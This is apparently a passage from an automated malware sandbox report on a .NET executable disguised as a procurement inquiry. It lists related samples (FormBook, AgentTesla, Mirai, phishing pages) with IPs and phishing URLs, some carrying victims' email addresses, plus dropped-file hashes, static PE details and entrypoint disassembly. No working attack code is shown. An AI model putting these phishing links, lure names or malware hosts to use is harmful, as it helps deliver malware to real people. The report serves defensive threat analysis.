                                                                                                                                                                          ndvdikok.vbsGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                          • 205.234.201.153
                                                                                                                                                                          https://ym6hc4gbb.cc.rs6.net/tn.jsp?f=001n209emIAeC5QJJGtmLyCc1JCQhC6WWTJBpDN65UPPB3G7Jc3gS6FE5wY-dlsmfGB2oibtx69nM243xkUAk5hSfd1krgPjddqmNEffcBMlXoUc-7UzTKQzIO6cFbowvNDiHeCqkvDBf2IjYJyuuzL-7jENnNra-V4&c=&ch=&__=///cpsess/guytrscdvfhgjbknkghjfbghklnm/hgjbdsaknjaxbgrak/ryan_howard@office.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 205.234.232.49
                                                                                                                                                                          Scan001-929999.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.38.83.196
                                                                                                                                                                          Axis Bank - 67 Account Pending Bank Receipt.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 198.38.83.196
                                                                                                                                                                          YzMjpENqal.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                          • 75.102.41.230
                                                                                                                                                                          2OVvfRwf5G.dllGet hashmaliciousPikaBotBrowse
                                                                                                                                                                          • 198.38.94.213
                                                                                                                                                                          2OVvfRwf5G.dllGet hashmaliciousPikaBotBrowse
                                                                                                                                                                          • 198.38.94.213
                                                                                                                                                                          Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.38.83.196
                                                                                                                                                                          UNIFIEDLAYER-AS-1USDOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 192.232.216.145
                                                                                                                                                                          DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 192.232.216.145
                                                                                                                                                                          DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 192.232.216.145
                                                                                                                                                                          https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 192.185.214.24
                                                                                                                                                                          https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 162.241.120.242
                                                                                                                                                                          https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 162.241.120.242
                                                                                                                                                                          https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 162.241.120.242
                                                                                                                                                                          https://pub-02d879d6055b4f31b3db7cbbb1499011.r2.dev/%60%60~~~%5D%5D%5D%5D%5D.html#theunis@khk.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 162.241.27.10
                                                                                                                                                                          https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                          • 162.241.114.35
                                                                                                                                                                          http://jtmidgett.law/CaptRedr.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 162.241.120.242
                                                                                                                                                                          ONEANDONE-ASBrauerstrasse48DESecuriteInfo.com.Win32.Malware-gen.9746.16728.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 217.160.0.183
                                                                                                                                                                          Hs97Nxxy5u.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 82.165.9.224
                                                                                                                                                                          WzfUKCEskB.elfGet hashmaliciousChaosBrowse
                                                                                                                                                                          • 77.68.37.125
                                                                                                                                                                          PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 213.171.195.105
                                                                                                                                                                          shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 217.160.0.111
                                                                                                                                                                          Zapytanie ofertowe (7427-23 ROCKFIN).exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                          • 213.165.67.118
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 217.76.128.34
                                                                                                                                                                          https://lamerelea.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 217.160.0.59
                                                                                                                                                                          Gq7FlDf6cE.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 217.174.247.147
                                                                                                                                                                          Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 217.160.0.95

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          No context

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          No context

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PRZ1SFHB43AUUAN2_114e609470f81dba78f154f8bfd85618171925_1d12552c_cab521f5-4d02-4313-9007-d8720e64d4a3\Report.wer

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.2010398424856006
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:WKucs2RpaP64+0BU/qauOJo1ZrFW0adzuiFfZ24IO884:WDcs2vaP6iBU/qapoadzuiFfY4IO88
                                                                                                                                                                          MD5:8D0B4BB60B0CAB920127B175178ED800
                                                                                                                                                                          SHA1:3B6C1817949B024BF79586A4DE1603E6684F2951
                                                                                                                                                                          SHA-256:A300B8CF2B9AEFDF1F19C7BBDD659AB3D3D18257C5D625CF9102D9C3A74E5FC0
                                                                                                                                                                          SHA-512:FF73A86A492E1A4F66AE2D8694C1C8FF010F109F0042291A366A45A271D65B6A29D8027CCB8B0F178EC1A2FE2BB17093FD8E72618A21DAEF2F52AFAC0DE4EAFC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.8.3.6.5.7.9.8.4.9.9.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.8.3.6.5.8.7.6.6.2.5.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.b.5.2.1.f.5.-.4.d.0.2.-.4.3.1.3.-.9.0.0.7.-.d.8.7.2.0.e.6.4.d.4.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.7.b.c.a.e.1.-.a.1.4.4.-.4.2.8.d.-.8.8.8.e.-.9.6.2.9.0.4.5.9.d.4.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.Q. .N.o... .H.D.P.E.-.1.6.-.G.M.-.0.0.-. .P.I.-.I.N.Q.-.3.0.0.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.f.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.c.-.0.0.0.1.-.0.0.1.4.-.d.7.2.1.-.6.7.4.f.9.c.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.1.b.7.e.8.d.f.8.0.7.f.b.2.2.d.6.3.f.3.7.3.8.f.a.9.0.b.f.1.8.7.0.0.0.0.0.0.0.0.!.0.0.0.0.b.7.e.0.8.2.0.6.9.f.6.8.2.b.7.e.3.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER20C2.tmp.dmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 05:40:58 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):329647
                                                                                                                                                                          Entropy (8bit):4.30429298653628
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:zK5Er+iSyRAGU4uEqFso5VLTgyCLQ33nx1MHmiEaKhndoDjsX+YAsB:O6r5SyhU4ksofTgyCU33nIL2o3W+P
                                                                                                                                                                          MD5:4EF40C3DF80FF2DD3A772C5C3A4C3E60
                                                                                                                                                                          SHA1:2E6D9011CE0BB3C4A5E118EA259ED7B43C6D50CD
                                                                                                                                                                          SHA-256:86968793A408DA13EF859A54084F23E1486A065A3EF7E2CA9CB94CBC707BC396
                                                                                                                                                                          SHA-512:2FD01188E0FF0FA9AA8CE685ACD1D4BD0168F90DF817AAF2F11510EF291715736AF0E45405D4D8DEC56F0A6D84DF293D43DD2306B9A525C5762FCD7082BE9849
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:MDMP..a..... .......j>+f............D...............X.......$....&......./...U..........`.......8...........T............5..............0&...........(..............................................................................eJ.......(......GenuineIntel............T.......,...h>+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER224A.tmp.WERInternalMetadata.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8500
                                                                                                                                                                          Entropy (8bit):3.7049620747478076
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJ+H6K6YN+SU9T3D6gmfZCmpr689bSgYsf7mm:R6lXJO6K6YESU97D6gmfIYSgLfj
                                                                                                                                                                          MD5:4894C8A1CD15C7B56568499D5A20BACB
                                                                                                                                                                          SHA1:442FA1D97B307A091C144F7BE5F5FAC00CB14916
                                                                                                                                                                          SHA-256:CB9585C4E539300AE611B2D8F680F05ECF9B87C1AE8F762FD88B436D382F9DD2
                                                                                                                                                                          SHA-512:B8CE08812A285668367ECD8A0B6ACF0A2CC45898A9AA20501EA68FDE54950DEFA7D13B815380BD5380D61991EE288B73E441B2D33534036F1092920D210F0BE7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.8.<./.P.i.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER228A.tmp.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4852
                                                                                                                                                                          Entropy (8bit):4.559696523715462
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zswJg77aI9tiWpW8VYpuoYm8M4JO6jyKFWa+q8vpjyOYLnofXpb/Md:uIjf2I7fj7VRJO6mSKpmbz0Xpb/Md
                                                                                                                                                                          MD5:C2EDE05671A416E1C6BE770FC7878C2C
                                                                                                                                                                          SHA1:8F0FE7CF24D4BF018A35D10A7B4EC3AEF5B00C00
                                                                                                                                                                          SHA-256:A4CA7268978F3B675F15CEF6001C6E88F39FA3DF8550B883F20C1E73677A3865
                                                                                                                                                                          SHA-512:2AD888B9EDC0B437612FB9CFD908EF9CBD7A29D261596295AFCC3EE2E2061C827E808698ACC7F5398B4A69728C1C7F0597DC98DBFA6CD0016276D58A74007093
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296443" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.log

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):1216
                                                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\C3vB7APK

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                          Entropy (8bit):1.1215420383712111
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                          Entropy (8bit):4.41702895468884
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:wcifpi6ceLPL9skLmb0m3SWSPtaJG8nAgex285i2MMhA20X4WABlGuN65+:Vi583SWIZBk2MM6AFBUo
                                                                                                                                                                          MD5:C326E9F481ACD5D8A58568449CD6153D
                                                                                                                                                                          SHA1:C0BD87599EE58BEB7BFC312322EC4880D38E3539
                                                                                                                                                                          SHA-256:74D684090424432E23EA3C6D3E1E417ADB278815C662757ED2DB7C55052DCF11
                                                                                                                                                                          SHA-512:A379C197F4C53EBAFEEF1DCB0FF004C4D3306371D64CA45437DEA5460972E8FD75F47B8F5AEB35045E0C94D5616034C612F3D5421E8923C17CA9E3BC5D2F5A1E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..MP................................................................................................................................................................................................................................................................................................................................................ .[d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.948061271759853
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          File size:761'864 bytes
                                                                                                                                                                          MD5:a20e41f9774504d4bace9a2a8a7989c6
                                                                                                                                                                          SHA1:b7e082069f682b7e35325e53f204d7216573e1e5
                                                                                                                                                                          SHA256:e20de80a71ce98da7d15176e36f66326ca635c42726f29e87ed0c4b01d2937e7
                                                                                                                                                                          SHA512:f5d7bfe42e777e7bf725e856ae1415684d8789baae4f8cf6c7dedd1239494bb03f31eb52951034ecfa12b00b36064601a993991a81161b702784ea3dd996f970
                                                                                                                                                                          SSDEEP:12288:UpYIPXjQTb6tSV27Kjc9y+2bQwuxkTCr+hiE/wx+T8/V44d1FbYuAAIkkR:KYIPsT+tu2WA8+2b5uxkTpiE/wioV44y
                                                                                                                                                                          TLSH:65F412813BB85F53ED3E03F500299A6443F4BA2A5512E38D2ED570E369B27809635DBF
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z................0..J...........i... ........@.. ....................................@................................

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:526c6a52d0e4f047

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x4b69a2
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0xDA0E7A2E [Wed Dec 5 09:11:10 2085 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                          xor eax, 35455354h
                                                                                                                                                                          xor dword ptr [edi+eax*2], esi
                                                                                                                                                                          dec eax
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [ebx+4Ah], dl
                                                                                                                                                                          push ebx
                                                                                                                                                                          cmp byte ptr [eax+edi+34h], al
                                                                                                                                                                          inc ebx
                                                                                                                                                                          inc ebx
                                                                                                                                                                          xor al, 37h
                                                                                                                                                                          xor eax, 00000035h
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
